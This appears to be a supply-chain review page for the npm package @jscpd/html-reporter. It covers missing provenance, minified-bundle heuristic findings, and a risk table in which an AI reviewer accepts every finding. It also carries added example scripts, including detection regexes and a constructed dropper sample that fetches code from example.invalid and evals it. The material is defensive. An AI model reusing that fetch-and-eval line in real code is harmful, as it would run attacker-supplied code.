@jscpd/html-reporter
html reporter for jscpd
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between the published tarball and the public source repository: the registry signature on the tarball only proves that the registry served these bytes, not that they were built from that source. The axios compromise (March 2026) relied on exactly this gap.
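As an added example (not part of this page, and not jscpd's own code), the check a reviewer would run to see what evidence the registry actually exposes for each version: a SLSA provenance attestation under `dist.attestations`, a registry signature under `dist.signatures` (which only proves the registry served these bytes), or neither. The packument below is constructed for the example; its field layout follows the shape the public npm registry returns, which is an assumption to confirm against a live `npm view @jscpd/html-reporter dist` before relying on the script.

```javascript
// Added example: classify each version in an npm packument by the
// supply-chain evidence the registry exposes. Field names (dist.signatures,
// dist.attestations.provenance.predicateType) are assumed to match the public
// registry's response shape; verify against a live packument.

const SLSA_PREDICATES = new Set([
  "https://slsa.dev/provenance/v0.2",
  "https://slsa.dev/provenance/v1",
]);

// One of: "provenance" (SLSA attestation present),
// "registry-signature-only" (registry signed it, no build attestation),
// "none" (neither).
function provenanceStatus(versionMeta) {
  const dist = (versionMeta && versionMeta.dist) || {};
  const att = dist.attestations;
  if (att && att.provenance && SLSA_PREDICATES.has(att.provenance.predicateType)) {
    return "provenance";
  }
  if (Array.isArray(dist.signatures) && dist.signatures.length > 0) {
    return "registry-signature-only";
  }
  return "none";
}

function classifyVersions(packument) {
  const out = {};
  for (const [version, meta] of Object.entries(packument.versions || {})) {
    out[version] = provenanceStatus(meta);
  }
  return out;
}

// Returns the per-version status plus the list of versions a policy that
// requires SLSA provenance would refuse to install.
function summarize(packument) {
  const byVersion = classifyVersions(packument);
  const missing = Object.entries(byVersion)
    .filter(([, status]) => status !== "provenance")
    .map(([version]) => version);
  return { byVersion, missing };
}

// Constructed sample packument: two versions in the state this page reports
// for every @jscpd/html-reporter release (registry signature, no attestation)
// and one hypothetical version carrying a SLSA attestation, so the "good"
// case is visible. Key ids and signatures are placeholders.
const SAMPLE_PACKUMENT = {
  name: "@jscpd/html-reporter",
  versions: {
    "4.2.3": {
      dist: { signatures: [{ keyid: "SHA256:constructed-key-id", sig: "constructed-signature" }] },
    },
    "4.2.4": {
      dist: { signatures: [{ keyid: "SHA256:constructed-key-id", sig: "constructed-signature" }] },
    },
    "9.9.9-hypothetical": {
      dist: {
        signatures: [{ keyid: "SHA256:constructed-key-id", sig: "constructed-signature" }],
        attestations: {
          url: "https://registry.npmjs.org/-/npm/v1/attestations/@jscpd%2fhtml-reporter@9.9.9-hypothetical",
          provenance: { predicateType: "https://slsa.dev/provenance/v1" },
        },
      },
    },
  },
};

const report = summarize(SAMPLE_PACKUMENT);
console.log(JSON.stringify(report, null, 2));
```

The script only reads metadata; it does not verify the attestation itself. For installed packages, `npm audit signatures` performs the actual cryptographic verification of registry signatures and provenance attestations against the registry's published keys, and it is the command to run before treating a "provenance" result as trustworthy.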
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:html/js/app.6818c71b.js | AI (source-diff): This is a webpack-bundled Vue.js SPA for the HTML reporter UI. Minified/bundled JS is expected and documented in the package's prebuild script and files array. | ai | |
| source-diff | obfuscated-file:html/js/app.4a4d284c.js | AI (source-diff): This is a standard webpack-bundled Vue.js SPA for the jscpd HTML report UI. Minified bundles are expected for this HTML reporter package. | ai | |
| source-diff | net-exec-file:html/js/app.4a4d284c.js | AI (source-diff): Network calls and dynamic code in this file are Vue Router navigation and Vue template compiler patterns in a bundled SPA — not dropper/loader behavior. | ai | |
| source-diff | obfuscated-file:html/workbox-79ffe3e0.js | AI (source-diff): File is the well-known Workbox 6.5.3 service worker library (self-identifies in code). Minified form is expected for this PWA caching library. | ai | |
| dependencies | unvetted-dep:colors | AI (dependencies): colors is pinned to 1.4.0, the last stable version before the sabotage incident. This is a deliberate safe pin and appropriate for this package. | ai | |
| dependencies | unvetted-dep:pug | AI (dependencies): pug is a well-known templating engine; its use is appropriate and expected for an HTML reporter package. | ai | |
| source-diff | obfuscated-file:html/js/app.48740c4b.js | AI (source-diff): This is a webpack-bundled Vue.js frontend app for the HTML report output. Minified JS is expected and normal for this package's HTML reporter assets. | ai | |
| source-diff | source-size-tripled | AI (source-diff): Size increase is due to addition of pre-built Vue.js + Font Awesome frontend assets for the HTML report. Expected for this type of reporter package. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): new Function() usage is in Vue.js v2.6.11 template compiler code — a well-known pattern in this framework, not a security risk for this package. | ai | |
| source-diff | net-exec-file:html/js/chunk-vendors.d0e2967a.js | AI (source-diff): File is the standard Vue.js v2.6.11 vendor bundle (confirmed by copyright header in sample). Network+exec pattern is Vue's template compiler, not malware. | ai | |
| provenance | no-provenance | AI (provenance): jscpd packages are published without Sigstore provenance; this is consistent across the ecosystem and not a risk indicator for this package. | ai | |
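The source-diff rules accepted above are heuristics, and the table shows why they fire on a legitimate package: a webpack bundle is one very long line, and Vue's template compiler sits in the same file as router or HTTP code. As an added example (not the scanner's own rule code, and not part of this page), the two heuristics as stated in the findings, followed by the triage step a reviewer takes before accepting: does the file self-identify as a known bundled library? The 3000-character threshold comes from the findings text; the pattern lists, the banner table and the three sample files are assumptions constructed for this example.

```javascript
// Added example: the "obfuscated-file" and "net-exec-file" heuristics as
// described in this page's findings, plus reviewer triage. Pattern lists,
// banner regexes and samples are assumptions made for the example.

const LONG_LINE_CHARS = 3000; // threshold quoted in the findings

const NETWORK_PATTERNS = [
  /\bfetch\s*\(/,
  /\bXMLHttpRequest\b/,
  /\bnavigator\.sendBeacon\b/,
  /\bnew\s+WebSocket\s*\(/,
  /\brequire\(\s*["'](?:https?|net|dns)["']\s*\)/,
];

const DYNAMIC_EXEC_PATTERNS = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /\bset(?:Timeout|Interval)\s*\(\s*["'`]/, // string argument, not a callback
  /\bvm\.(?:runIn\w+|Script)\b/,
];

// Banner strings that well-known bundled libraries embed in their output.
// A match explains why the heuristics fired; it does not prove the file is an
// unmodified upstream build, because a banner is trivially copied.
const KNOWN_BANNERS = [
  { name: "Vue.js", re: /Vue\.js v(\d+\.\d+\.\d+)/ },
  { name: "Workbox", re: /workbox:core:(\d+\.\d+\.\d+)/ },
];

function scanFile(path, text) {
  const longestLine = text.split("\n").reduce((m, l) => Math.max(m, l.length), 0);
  const hasNetwork = NETWORK_PATTERNS.some((re) => re.test(text));
  const hasDynamicExec = DYNAMIC_EXEC_PATTERNS.some((re) => re.test(text));
  const findings = [];
  if (longestLine > LONG_LINE_CHARS) findings.push("obfuscated-file");
  if (hasNetwork && hasDynamicExec) findings.push("net-exec-file");
  let identifiedAs = null;
  for (const banner of KNOWN_BANNERS) {
    const m = text.match(banner.re);
    if (m) {
      identifiedAs = `${banner.name} ${m[1]}`;
      break;
    }
  }
  return { path, longestLine, hasNetwork, hasDynamicExec, findings, identifiedAs };
}

// "explained" is the state the accepted-risk table records. It still warrants
// a byte-for-byte comparison against a build produced from the upstream
// source at the same version, since the banner alone is not evidence.
function triage(result) {
  if (result.findings.length === 0) return "clean";
  if (result.identifiedAs) return `explained: ${result.identifiedAs}`;
  return "review-required";
}

// Constructed samples: a Vue-like bundle (banner + one minified line that
// contains both an XHR and a template-compiler style new Function), a
// dropper-like one-liner with no banner, and a plain module.
const VUE_LIKE_BUNDLE =
  "/*!\n * Vue.js v2.6.11\n * (c) 2014-2019 Evan You\n * Released under the MIT License.\n */\n" +
  "var r=new XMLHttpRequest();" +
  'var f=new Function("return 1");' +
  "var x=0;".repeat(500);

const DROPPER_LIKE =
  'fetch("https://example.invalid/stage2").then(r=>r.text()).then(c=>eval(c));\n';

const PLAIN_MODULE = "module.exports = function add(a, b) { return a + b; };\n";

const SAMPLES = [
  ["html/js/chunk-vendors.constructed.js", VUE_LIKE_BUNDLE],
  ["lib/postinstall.constructed.js", DROPPER_LIKE],
  ["lib/add.js", PLAIN_MODULE],
];

function scanAll(samples) {
  return samples.map(([path, text]) => {
    const result = scanFile(path, text);
    return { ...result, triage: triage(result) };
  });
}

for (const r of scanAll(SAMPLES)) {
  console.log(`${r.path}: findings=[${r.findings.join(", ")}] -> ${r.triage}`);
}
```

The Vue-like sample trips both rules and is explained by its banner, which is exactly the situation the rows above describe; the dropper-like sample trips only net-exec-file and has nothing to explain it. The distinguishing check in practice is not the banner but reproducibility: build the same asset from the upstream tag and compare hashes, or at least diff the file against the published build of the library version it claims to be.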
Versions (showing 22 of 22)
| Version | Deps | Published |
|---|---|---|
| 4.2.4 | 3 / 12 | |
| 4.2.3 | 3 / 12 | |
| 4.2.2 | 3 / 12 | |
| 4.2.1 | 3 / 12 | |
| 4.2.0 | 3 / 12 | |
| 4.1.1 | 3 / 12 | |
| 4.1.0 | 3 / 12 | |
| 4.0.5 | 3 / 12 | |
| 4.0.4 | 3 / 12 | |
| 4.0.3 | 3 / 12 | |
| 4.0.2 | 3 / 12 | |
| 4.0.1 | 3 / 12 | |
| 4.0.0 | 4 / 10 | |
| 3.5.8 | 4 / 4 | |
| 3.5.6 | 4 / 4 | |
| 3.5.3 | 2 / 2 | |
| 3.3.22 | 2 / 2 | |
| 3.3.20 | 2 / 2 | |
| 3.3.17 | 2 / 2 | |
| 3.3.15 | 3 / 2 | |
| 3.3.14 | 3 / 2 | |
| 3.3.11 | 0 / 0 |
v4.2.4
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.2.3
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.2.2
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.2.1
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.2.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.1.1
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.1.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.0.4
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v4.0.3
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v4.0.2
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v4.0.1
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v4.0.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v3.5.8
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v3.5.6
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v3.5.3
4 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
[Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v3.3.22
3 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v3.3.20
3 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v3.3.17
3 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v3.3.15
3 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance via CI/CD.
v3.3.14
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v3.3.11
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.